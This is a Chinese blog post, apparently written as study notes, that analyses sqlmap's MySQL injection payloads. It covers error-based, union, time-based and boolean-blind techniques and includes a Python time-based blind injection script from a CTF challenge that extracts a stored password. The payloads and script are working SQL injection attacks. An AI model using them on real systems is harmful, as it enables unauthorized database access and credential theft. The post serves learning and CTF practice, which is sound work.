<!DOCTYPE html>
<html lang="en">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="心之所向皆是遗憾，目之所及皆是过往">
  <meta name="author" content="2cu">
  <meta name="keywords" content>
  <title>Sqlmap-Payload 分析与学习 - 2cu的博客</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css">


<!-- 主题依赖的图标库，不要自行修改 -->
<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_fmb4a04yx8h.css">

<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">



<link rel="stylesheet" href="/css/main.css">

<!-- 自定义样式保持在最底部 -->


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>2cu</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">
              <i class="iconfont icon-home-fill"></i>
              Home</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">
              <i class="iconfont icon-archive-fill"></i>
              Archives</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">
              <i class="iconfont icon-category-fill"></i>
              Categories</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">
              <i class="iconfont icon-user-fill"></i>
              About</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/qiangfu/">
              <i class="iconfont icon-tags-fill"></i>
              偶尔看看女神</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/music/">
              <i class="iconfont icon-tags-fill"></i>
              音乐间</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">
              <i class="iconfont icon-link-fill"></i>
              Links</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/704053.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <div class="mt-3 post-meta">
                  <i class="iconfont icon-date-fill" aria-hidden="true"></i>
                  <time datetime="2020-05-13 16:06">
                    May 13, 2020 pm
                  </time>
                </div>
              

              <div class="mt-1">
                
                  
                  <span class="post-meta mr-2">
                    <i class="iconfont icon-chart"></i>
                    819 字
                  </span>
                

                
                  
                  <span class="post-meta mr-2">
                      <i class="iconfont icon-clock-fill"></i>
                    
                    
                    12
                     分钟
                  </span>
                

                
              </div>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h1 id="Sqlmap-Payload-分析与学习"><a href="#Sqlmap-Payload-分析与学习" class="headerlink" title="Sqlmap-Payload 分析与学习"></a>Sqlmap-Payload 分析与学习</h1><a id="more"></a>



<h2 id="前置知识—相关函数、语法"><a href="#前置知识—相关函数、语法" class="headerlink" title="前置知识—相关函数、语法"></a>前置知识—相关函数、语法</h2><p>暂时只探究mysql</p>
<ul>
<li>ORD 函数返回字符串第一个字符的 <a href="http://www.nowamagic.net/academy/tag/ASCII" target="_blank" rel="noopener">ASCII</a> 值。(MySQL)</li>
</ul>
<p><img src="https://s1.ax1x.com/2020/05/13/Yd3eTP.png" srcset="/img/loading.gif" alt="Yd3eTP.png"></p>
<ul>
<li>MID用于从文本字段中提取字符。</li>
</ul>
<pre><code class="hljs undefined">select MID(User,1,3) as name from user; //从user表取User列提取前3位字符</code></pre>

<p><img src="https://s1.ax1x.com/2020/05/13/Yd3nFf.png" srcset="/img/loading.gif" alt="Yd3nFf.png"></p>
<ul>
<li>SELECT DISTINCT 语句</li>
</ul>
<p>在表中，一个列可能会包含多个重复值，有时您也许希望仅仅列出不同distinct(清晰的)的值。</p>
<p>DISTINCT 关键词用于返回唯一不同的值。(换句话就是去重)</p>
<p><img src="https://s1.ax1x.com/2020/05/13/YdGDd1.png" srcset="/img/loading.gif" alt="YdGDd1.png"></p>
<ul>
<li>CAST</li>
</ul>
<p>CAST函数用于将某种数据类型的表达式显式转换为另一种数据类型。CAST()函数的参数是一个表达式，它包括用AS关键字分隔的源值和目标数据类型。</p>
<pre><code class="hljs undefined">SELECT CAST(&apos;9.5&apos; AS decimal(10,2))  结果：9.5(精度与小数位数分别为10与2。精度是总的数字位数，包括小数点左边和右边位数的总和。而小数位数是小数点右边的位数)</code></pre>

<p><img src="https://s1.ax1x.com/2020/05/13/YdGBZR.png" srcset="/img/loading.gif" alt="YdGBZR.png"></p>
<ul>
<li>ISNULL</li>
</ul>
<p>IFNULL() 函数用于判断第一个表达式是否为 NULL，如果为 NULL 则返回第二个参数的值，如果不为 NULL 则返回第一个参数的值。</p>
<p><img src="https://s1.ax1x.com/2020/05/13/YdtHW6.png" srcset="/img/loading.gif" alt="YdtHW6.png"></p>
<h2 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h2><pre><code class="hljs undefined">B: Boolean-based blind SQL injection（布尔型注入）
E: Error-based SQL injection（报错型注入）
U: UNION query SQL injection（可联合查询注入）
S: Stacked queries SQL injection（可多语句查询注入）
T: Time-based blind SQL injection（基于时间延迟注入）
Q: inline_query(内联查询)</code></pre>

<h3 id="–technique-E"><a href="#–technique-E" class="headerlink" title="–technique E"></a>–technique E</h3><pre><code class="hljs undefined">1&apos; AND (SELECT 7231 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x7170787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nfrT</code></pre>

<p>sqlmap这边报错注入时用floor()报错注入，</p>
<p>准确地说应该是floor,count,group by冲突报错</p>
<p>经典的floor注入语句:</p>
<pre><code class="hljs undefined">and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)</code></pre>

<h3 id="–technique-U"><a href="#–technique-U" class="headerlink" title="–technique U"></a>–technique U</h3><pre><code class="hljs undefined">-3817&apos; UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a626b71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170787a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1)-- ioqC</code></pre>

<h3 id="–technique-S"><a href="#–technique-S" class="headerlink" title="–technique S"></a>–technique S</h3><pre><code class="hljs undefined">
</code></pre>

<h3 id="–technique-T"><a href="#–technique-T" class="headerlink" title="–technique T"></a>–technique T</h3><p>时间盲注跑库名</p>
<pre><code class="hljs undefined">1&apos;) AND (SELECT 1133 FROM (SELECT(SLEEP(7-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))&gt;1,0,7)))))tOYz) AND (&apos;Hgrd&apos;=&apos;Hgrd</code></pre>

<h3 id="–technique-B"><a href="#–technique-B" class="headerlink" title="–technique B"></a>–technique B</h3><p>布尔盲注跑库名</p>
<pre><code class="hljs undefined">1&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),4,1))&gt;1 AND (&apos;rfEX&apos;=&apos;rfEX</code></pre>

<p>拆分:</p>
<ul>
<li>1’)  、AND (‘rfEX’=’rfEX  —-&gt;闭合</li>
<li>schema_name AS NCHAR  —&gt;NCHAR 可存储4000个字符，无论英文还是汉字</li>
<li>CAST（xxx,0x20）—-&gt;类型转换</li>
<li>SELECT DISTINCT() FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1. —-&gt;正常查库名</li>
<li>MID（xxx,4,1)  —&gt;取第四个字符</li>
<li>ORD（） —-&gt;转换为ascii</li>
</ul>
<h2 id><a href="#" class="headerlink" title></a></h2><h2 id="盲注的二分法"><a href="#盲注的二分法" class="headerlink" title="盲注的二分法:"></a>盲注的二分法:</h2><h3 id="图解二分法"><a href="#图解二分法" class="headerlink" title="图解二分法:"></a>图解二分法:</h3><p><img src="https://s1.ax1x.com/2020/05/13/YdtLQO.png" srcset="/img/loading.gif" alt="YdtLQO.png"></p>
<h3 id="以de1ctf2019-shellshellshell第一个考点为例子"><a href="#以de1ctf2019-shellshellshell第一个考点为例子" class="headerlink" title="以de1ctf2019 shellshellshell第一个考点为例子"></a>以de1ctf2019 shellshellshell第一个考点为例子</h3><pre><code class="hljs undefined">import requests
import time
url = &apos;http://10ae3804-10fb-4932-b313-1af02d85b43a.node3.buuoj.cn/index.php?action=publish&apos;
cookies = &#123;
#先登陆，然后换cookie
    &quot;PHPSESSID&quot;: &quot;jtkj5r8j0eshqb382fv9g1m3i7&quot;
&#125;
text=&apos;&apos;
for i in range(1,33):
    l=28
    h=126
    while abs(h - l) &gt; 1:
        mid=(l+h)/2
        payload=&apos;c`,if(((ascii(mid((select password from ctf_users limit 1),&#123;&#125;,1)))&gt;&#123;&#125;),sleep(3),1))#&apos;
        data=&#123;
            &apos;signature&apos;:payload.format(i,mid),
            &apos;mood&apos;:0
        &#125;
        now_t=time.time()
        re=requests.post(url,data=data,cookies=cookies)
        #print(re.text)
        if time.time()-now_t &gt; 3:
            print(&quot;l &quot; +payload.format(i,mid))
            l=mid
        else:
            print(&quot;h &quot; +payload.format(i,mid))
            h=mid
    mid_num = int((l+h+1) / 2)
    text += chr(int(h))
    print(text)</code></pre>

<p><img src="https://s1.ax1x.com/2020/05/13/YdtOyD.png" srcset="/img/loading.gif" alt="YdtOyD.png"><br><img src="https://s1.ax1x.com/2020/05/13/YdtqSK.png" srcset="/img/loading.gif" alt="YdtqSK.png"></p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/安全工具/">安全工具</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/05/13/第四章-存储器管理/">
                        <span class="hidden-mobile">第四章-存储器管理</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>





  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>






<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Sqlmap-Payload 分析与学习&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>


















</body>
</html>
